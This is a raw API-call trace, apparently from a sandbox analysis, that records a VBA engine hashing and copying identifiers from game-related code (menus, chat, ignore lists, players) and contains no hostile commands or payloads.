0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectMenu9") returned 0x102e52 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuMenu") returned 0x10553f [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.240] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CheckRectsNav") returned 0x1035f5 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.240] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuPend") returned 0x10a647 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.240] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuPend") returned 0x10a647 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PlayerSelected") returned 0x10a280 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.240] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MenuPend") returned 0x10a647 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AnimateMenu") returned 0x108e3b [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DropFlag") returned 0x107d52 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Weapon") returned 0x10cce1 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpecialSnd") returned 0x10cff8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Weapon") returned 0x10cce1 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpecialSnd") returned 0x10cff8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Weapon") returned 0x10cce1 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SpecialSnd") returned 0x10cff8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Advertisements") returned 0x100287 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="CheckRectsAd" | out: _Dst="CheckRectsAd") returned 0x0 [0030.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a511f6, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0030.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a511f6, cbMultiByte=7, lpWideCharStr=0x766cf98, cchWideChar=7 | out: lpWideCharStr="sendmsg") returned 7 [0030.241] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.241] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lNewOffSet" | out: _Dst="lNewOffSet") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lNewOffSet" | out: _Dst="lNewOffSet") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="lMsg" | out: _Dst="lMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="oNewMsg" | out: _Dst="oNewMsg") returned 0x0 [0030.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5129a, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0030.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5129a, cbMultiByte=8, lpWideCharStr=0x766cf98, cchWideChar=8 | out: lpWideCharStr="GameChat") returned 8 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="X" | out: _Dst="X") returned 0x0 [0030.242] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="X" | out: _Dst="X") returned 0x0 [0030.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51366, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0030.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51366, cbMultiByte=12, lpWideCharStr=0xb4e31c8, cchWideChar=12 | out: lpWideCharStr="KillChatLine") returned 12 [0030.243] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51416, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0030.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51416, cbMultiByte=5, lpWideCharStr=0x766cf98, cchWideChar=5 | out: lpWideCharStr="GetPN") returned 5 [0030.243] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.243] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Players") returned 0x10bb5d [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LCase") returned 0x10e93a [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Players") returned 0x10bb5d [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nick") returned 0x101c0d [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LCase") returned 0x10e93a [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetPN") returned 0x100027 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddIgnore") returned 0x10487c [0030.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a514b2, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a514b2, cbMultiByte=9, lpWideCharStr=0x766cf98, cchWideChar=9 | out: lpWideCharStr="AddIgnore") returned 9 [0030.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.243] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="plr" | out: _Dst="plr") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.244] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.244] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.244] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.244] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="j" | out: _Dst="j") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GetPN") returned 0x100027 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Players") returned 0x10bb5d [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="j") returned 0x101061 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Admin") returned 0x10a886 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GameChat") returned 0x1081fd [0030.244] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="GameChat" | out: _Dst="GameChat") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.244] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.244] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LCase") returned 0x10e93a [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GameChat") returned 0x1081fd [0030.245] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="GameChat" | out: _Dst="GameChat") returned 0x0 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IsIgnored") returned 0x10ffbf [0030.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5152a, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0030.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a5152a, cbMultiByte=9, lpWideCharStr=0x766cf98, cchWideChar=9 | out: lpWideCharStr="IsIgnored") returned 9 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.245] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="plr" | out: _Dst="plr") returned 0x0 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.246] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.246] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.246] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LCase") returned 0x10e93a [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IsIgnored") returned 0x10ffbf [0030.246] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="IsIgnored" | out: _Dst="IsIgnored") returned 0x0 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0030.246] CExposedStream::Read () returned 0x0 [0030.246] CExposedStream::Read () returned 0x0 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RemoveIgnore") returned 0x107565 [0030.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51556, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0030.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a51556, cbMultiByte=12, lpWideCharStr=0xb4e31c8, cchWideChar=12 | out: lpWideCharStr="RemoveIgnore") returned 12 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.246] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="plr" | out: _Dst="plr") returned 0x0 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0030.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.247] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.247] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.247] strcpy_s (in: _Dst=0x7fee3aad2b0, _DstSize=0x100, _Src="I" | out: _Dst="I") returned 0x0 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LCase") returned 0x10e93a [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ignored") returned 0x109dad [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="I") returned 0x101060 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="vbNullString") returned 0x10c2ae [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GameChat") returned 0x1081fd [0030.247] strcpy_s (in: _Dst=0x7fee3aad150, _DstSize=0x100, _Src="GameChat" | out: _Dst="GameChat") returned 0x0 [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Chr") returned 0x107e4b [0030.247] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="plr") returned 0x10c464 